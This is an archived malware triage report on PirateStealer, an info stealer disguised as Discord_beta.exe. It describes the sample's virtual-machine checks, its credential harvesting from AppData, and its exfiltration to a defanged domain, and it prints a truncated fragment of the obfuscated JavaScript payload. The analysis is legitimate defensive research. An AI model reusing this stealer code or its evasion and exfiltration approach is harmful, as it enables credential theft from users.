Malware Analysis and Triage Report : PirateStealer -
Discord_beta.exe
By Mayank Malik
Published: 2022-12-01 · Archived: 2026-04-02 12:45:04 UTC
PirateStealer is a new Info Stealer in the scene. Not much info is provided about this family and the sample is
relatively new. No traces has been found on either Malware Bazaar or Malpedia. The sample will be submitted to
aforementioned databases after this post.
The sample executes itself and checks for presence of Virtualized Environment by using registry information and
disk drive identifiers. It throws an error and exists itself after failing the virtualization check. If the check
succeeds, it scours through the directory C:\User\<username>\AppData\Local\* to harvest credentials, create an
archive save.zip and exfiltrate it over HTTPS to an endpoint on 4wz[.]us
let
var _0x4e36eb = _0x534c;
function _0x534c(_0x534ce2, _0x16ca1e) {
 var _0x53c7eb = _0x519e();
 return _0x534c = function (_0x8a4667, _0x43ddf0) {
 _0x8a4667 = _0x8a4667 - (0x1d98 + -0x1329 + 0x1d2 * -0x5);
 var _0x1cdf74 = _0x53c7eb[_0x8a4667];
 return _0x1cdf74;
 }, _0x534c(_0x534ce2, _0x16ca1e);
}
function _0x519e() {
 var _0x2b3aad = ['np?(gg=win', 'PBOWW', 'querystrin', 'https:/', 'Added', '3308240uRVMVW', 'atus.disco', 'AP
 _0x519e = function () {
 return _0x2b3aad;
 };
 return _0x519e();
}(function (_0x3f6ee4, _0x2fc5be) {
 var _0x346931 = _0x534c,
 _0x41454c = _0x3f6ee4();
Source: https://mostwanted002.page/post/malware-analysis-and-triage-report-piratestealer
https://mostwanted002.page/post/malware-analysis-and-triage-report-piratestealer
Page 1 of 1